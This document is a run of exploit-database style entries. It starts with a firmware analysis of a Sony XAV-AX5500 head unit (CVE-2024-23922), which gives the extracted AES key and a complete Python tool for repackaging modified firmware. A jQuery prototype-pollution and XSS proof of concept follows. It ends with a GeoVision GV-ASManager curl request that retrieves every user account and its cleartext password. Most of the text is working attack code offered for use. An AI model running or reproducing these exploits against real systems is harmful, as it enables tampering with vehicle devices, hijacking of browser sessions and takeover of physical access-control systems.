# Coming from a mobile and desktop computer environment, one may be used to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.
# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.
# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.
# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
# discussed in this report.
# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
# - SHDS1132.up6
# - SHMC1132.u88
# - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
#
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
# ...
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 00778000
#
# Given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at 0x2800 and 0x80000, we get the recovery and main applications.
# Once we remove the packaging bytes, seeing that the repetitive patterns align with FFs gives
# us a strong indication the encryption function is operating in an ECB-style configuration,
# giving us an avenue, even if we do not recover the key, to potentially make modifications
# to the firmware depending on how the checksum is being calculated.
# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyzing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor plus a number an idiot would use for their luggage, followed by enough
# padding zeros to get us to a 16 byte key
# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.
#
# Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.
# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)
# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir

import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# Filenames as found in the .FIR
MAIN_BINARY_NAME="main_16.bin"
MAIN_RAR_NAME="main_16.rar"
DECRYPTED_FILE_NAME="decrypt.bin"
ENCRYPTED_FILE_NAME="encrypt.bin"

# Offsets in the .FIR
HEADER_LENGTH=0x80
RECOVERY_OFFSET=0x2800
MAIN_OFFSET=0x80000
CHECKSUM_OFFSET=0x800000-0x10
CHECKSUM_SIZE=0x4
RAR_LENGTH_OFFSET=0x4
RAR_LENGTH_SIZE=0x4

# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'

def decrypt_file(input_file, output_file):
    backend = default_backend()
    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
    decryptor = cipher.decryptor()
    with open(input_file, 'rb') as file:
        ciphertext = file.read()
    # Strip the unencrypted header
    ciphertext = ciphertext[HEADER_LENGTH:]
    decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
    with open(output_file, 'wb') as file:
        file.write(decrypted_data)

def aes_encrypt_file(input_file, output_file):
    backend = default_backend()
    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
    encryptor = cipher.encryptor()
    with open(input_file, 'rb') as file:
        plaintext = file.read()
    ciphertext = encryptor.update(plaintext) + encryptor.finalize()
    with open(output_file, 'wb') as file:
        file.write(ciphertext)

def get_sony_32(data):
    csum = int()
    for i in data:
        csum = csum + i
    return csum % 2147483648 # 2^31

def validate_args(winrar_path, source_file, destination_file):
    # Check if the WinRAR executable exists and is a file
    if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
        print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
        sys.exit(1)

    # Check if the source file exists
    if not os.path.isfile(source_file):
        print(f"[x] Error: The specified source file '{source_file}' does not exist.")
        sys.exit(1)

    # Read 8 bytes from offset 0x10 in the source file
    try:
        with open(source_file, 'rb') as f:
            f.seek(0x10)
            signature = f.read(8)
            if signature != b'KRSELECO':
                print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
                sys.exit(1)
    except Exception as e:
        print(f"[x] Error: Failed to read from '{source_file}': {e}")
        sys.exit(1)

    # Check if the destination file already exists
    if os.path.exists(destination_file):
        print(f"[x] Error: The destination file '{destination_file}' already exists.")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
    parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
    parser.add_argument("source_file", help="Path to original .FIR file")
    parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
    args = parser.parse_args()

    validate_args(args.winrar_path, args.source_file, args.destination_file)

    RAR_2_PATH = args.winrar_path
    GOOD_FIRMWARE_FILE = args.source_file
    DESTINATION_FIRMWARE_FILE = args.destination_file

    # make temporary directory
    workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")

    # copy the good firmware file into the temp directory
    temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
    shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)

    print("[+] Cutting the head off and decrypting the contents")
    decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
    decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)

    print("[+] Dump out the rar file")
    with open(decrypted_file_path, 'rb') as file:
        # right before the rar file there is a 4 byte length header for the rar file. get that.
        file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
        original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
        rar_file_bytes = file.read(original_rar_length)

    # now dump that out
    rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
    with open(rar_file_path, 'wb') as rarfile:
        rarfile.write(rar_file_bytes)

    # check that the stat of the file matches what the header told us
    dumped_rar_size = os.stat(rar_file_path).st_size
    if dumped_rar_size != original_rar_length:
        print("[!] extracted filesizes don't match, there may be corruption", dumped_rar_size, original_rar_length)

    print("[+] Extracting the main binary from the rar file")
    os.system("unrar x " + rar_file_path + " " + workdir)

    print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
    print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
    input()
    print("[+] Continuing")

    print("[+] Putting your main binary back into the rar file")
    os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)

    # we could fix this by writing some FFs
    new_rar_size=os.stat(rar_file_path).st_size
    if dumped_rar_size > os.stat(rar_file_path).st_size:
        print("[!!] The rar size is smaller than the old one. This might cause a problem.")
        print("[!!] Push any key to continue, ctrl+c to abort")
        input()

    with open(decrypted_file_path, 'r+b') as file:
        # right before the rar file there is a 4 byte length header for the rar file. go back there
        file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
        # overwrite the old size with the new size
        file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))

        print("[+] Deleting the old rar from the main container")
        # delete the old rar from the main container by FFing it up
        file.write(b'\xFF'*original_rar_length)

        # seek back to the start
        file.seek(MAIN_OFFSET)

        print("[+] Loading the new rar back into the main container")
        with open(rar_file_path, 'rb') as rarfile:
            new_rarfile_bytes = rarfile.read()
        file.write(new_rarfile_bytes)

    print("[+] Updating Checksum")
    with open(decrypted_file_path, 'rb') as file:
        contents = file.read()
    contents = contents[:-0x0010]
    s32_sum = get_sony_32(contents)

    with open(decrypted_file_path, 'r+b') as file:
        file.seek(CHECKSUM_OFFSET)
        # read out the current checksum
        old_checksum_bytes=file.read(CHECKSUM_SIZE)
        print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
        # go back and update it with new checksum
        print("new checksum:", s32_sum, hex(s32_sum))
        new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
        file.seek(CHECKSUM_OFFSET)
        file.write(new_checksum_bytes)

    print("[+] Encrypting the main container back up")
    encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
    aes_encrypt_file(decrypted_file_path, encrypted_file_path)

    print("[+] Reattaching the main container to the header and writing to dest")
    with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
        with open(temp_fir_file, 'rb') as firfile:
            header = firfile.read(HEADER_LENGTH)
        file.write(header)
        with open(encrypted_file_path, 'rb') as encfile:
            enc_contents = encfile.read()
        file.write(enc_contents)

    print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
    input()
    shutil.rmtree(workdir)

if __name__ == "__main__":
    main()
  24. # Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps

# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.

# PoC (Proof of Concept):
# ------------------------------------

/*
 * Exploit for CVE-2020-7656 and CVE-2019-11358
 * Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
 */

// COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)

// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);

// 2. Function to execute after jQuery is loaded
script.onload = function() {
    console.log("[+] Vulnerable jQuery loaded!");

    // 3. Inject malicious content for XSS (CVE-2020-7656)
    const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
    $('body').append(maliciousContent);
    console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");

    // 4. Exploit Prototype Pollution (CVE-2019-11358)
    const defaultConfig = {
        "backLink": "<a href='https://example.com'>Go Back</a>"
    };
    const maliciousParams = {
        "__proto__": {
            "backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
        }
    };

    // 5. Merge objects using vulnerable $.extend
    let config = $.extend(true, defaultConfig, maliciousParams);
    console.log("[+] Prototype Pollution executed via $.extend().");

    // 6. Create a container to inject malicious content
    const container = document.createElement('div');
    container.id = 'backLinkContainer';
    document.body.appendChild(container);

    // 7. Inject malicious content into the DOM
    $('#backLinkContainer').html(config.backLink);
    console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};

// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");
  25. # Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902

Information disclosure vulnerability in the Geovision GV-ASManager web application, version v6.1.0.0 or less.

Requirements
To perform a successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (in some cases it is publicly accessible)
- Access to the Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve the cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reuse the retrieved password against other digital assets of the organization.

cURL script:
curl --path-as-is -i -s -k -X $'POST' \
  -H $'Host: [SET-TARGET]' \
  -H $'Content-Length: 41' \
  -H $'Sec-Ch-Ua-Platform: \"Linux\"' \
  -H $'X-Requested-With: XMLHttpRequest' \
  -H $'Accept-Language: en-US,en;q=0.9' \
  -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' \
  -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H $'Sec-Ch-Ua-Mobile: ?0' \
  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' \
  -H $'Accept: */*' \
  -H $'Origin: https://192.168.50.129' \
  -H $'Sec-Fetch-Site: same-origin' \
  -H $'Sec-Fetch-Mode: cors' \
  -H $'Sec-Fetch-Dest: empty' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  -H $'Priority: u=1, i' \
  -H $'Connection: keep-alive' \
  -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
  --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
  $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'

After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS